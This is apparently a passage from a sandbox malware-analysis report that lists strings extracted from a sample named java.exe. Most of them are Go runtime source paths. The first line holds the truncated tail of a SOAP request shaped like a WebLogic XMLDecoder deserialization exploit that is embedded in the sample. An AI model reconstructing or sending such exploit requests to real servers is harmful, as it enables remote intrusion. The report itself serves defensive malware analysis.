method="write"><string/></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></string></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
Source: java.exeString found in binary or memory: xmlns:wsa="http://www.w3.org/2005/08/addressing"
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/abi/abi.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/abi/type.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/abi/unsafestring_go120.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/cpu/cpu.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/cpu/cpu_x86.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/cpu/cpu_x86.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/internal/atomic/types.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/internal/sys/intrinsics.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/bytealg.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/equal_generic.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/count_native.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/index_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/compare_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/count_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/equal_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/index_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bytealg/indexbyte_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/alg.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/stubs.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/typekind.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/arena.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mheap.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mem.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mem_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/lockrank_off.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/lock_sema.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/runtime2.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/atomic_pointer.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mwbbuf.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/cgocall.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/os_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/proc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/runtime1.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/chan.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/cpuflags_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/debug.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/debugcall.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/symtab.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/defs_windows_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/env_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/error.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/traceback.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/exithook.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/extern.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/hash64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/histogram.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/iface.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/type.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/lfstack.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/tagptr_64bit.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/time_nofake.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/lockrank.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/malloc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mfixalloc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mcache.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/fastlog2.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/float.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/map.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/msize.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/map_fast32.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/map_fast64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/map_faststr.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mbarrier.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mbitmap.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mcentral.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgcsweep.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/trace.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mcheckmark.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/metrics.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mfinal.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/sema.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgcwork.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mstats.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mprof.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgcpacer.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/print.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgclimit.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgcmark.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/stack.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgcstack.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/string.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mgcscavenge.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/time.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mranges.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mpagealloc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mpallocbits.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mpagecache.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mpagealloc_64bit.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/mspanset.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/netpoll.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/netpoll_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/select.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/preempt.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/pagetrace_off.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/panic.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/signal_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/pinner.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/symtabinl.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/write_err.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/runtime.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/rwmutex.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/sigqueue.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/slice.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/sys_x86.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/stkframe.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/syscall_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/unsafe.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/utf8.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/asm.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/asm_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/duff_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/memclr_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/memmove_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/preempt_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/rt0_windows_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/sys_windows_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/time_windows_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/runtime/zcallback_windows.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/atomic/type.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/atomic/value.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/reflectlite/swapper.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/reflectlite/type.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/reflectlite/value.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/errors/errors.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/errors/wrap.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/bits/bits.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sort/search.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sort/slice.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sort/sort.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sort/zsortfunc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sort/zsortinterface.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/floor.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/abs.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/bits.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/frexp.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/unsafe.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/copysign.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/ldexp.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/log.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/log10.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/mod.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/modf.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/pow.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/exp.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/signbit.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/sqrt.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/exp_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/exp_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/floor_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/log_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/unicode/utf8/utf8.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/atof.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/atoi.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/quote.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/itoa.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/decimal.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/eisel_lemire.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/ftoa.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/ftoaryu.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/bytealg.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/cond.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/mutex.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/map.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/once.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/pool.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/poolqueue.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/runtime.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/rwmutex.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/waitgroup.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/unicode/graphic.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/unicode/letter.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/unicode/casetables.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/unicode/tables.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/itoa/itoa.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/reflect/abi.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/reflect/value.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/reflect/type.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/reflect/deepequal.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/reflect/makefunc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/unicode/digit.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/reflect/float32reg_generic.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/reflect/asm_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/fmtsort/sort.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/io/io.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/io/multi.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/io/pipe.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/sysdll/sysdll.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/unicode/utf16/utf16.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/dll_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/syscall_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/syscall.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/env_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/exec_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/security_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/zsyscall_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/types_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/syscall/wtf8_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/registry/key.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/registry/value.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/registry/zsyscall_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/format.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/time.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/format_rfc3339.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/sleep.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/sys_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/zoneinfo.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/zoneinfo_read.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/zoneinfo_goroot.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/zoneinfo_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/registry/syscall.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/time/zoneinfo_abbrs_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/path/path.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/io/fs/format.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/io/fs/fs.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/testlog/exit.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/testlog/log.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/net_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/syscall_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/windows/zsyscall_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/sync/oncefunc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/fd.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/fd_mutex.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/fd_fsync_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/errno_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/fd_poll_runtime.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/fd_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/fd_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/sendfile_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/sockopt.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/sockopt_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/poll/sockoptip.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/syscall/execenv/execenv_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/dir.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/dir_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/types_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/types.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/env.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/error.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/exec.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/exec_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/exec_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/file_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/str.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/executable.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/executable_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/file.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/file_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/rawconn.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/path_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/proc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/stat_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/stat.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/sys.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/sys_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/os/tempfile.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/fmt/errors.go
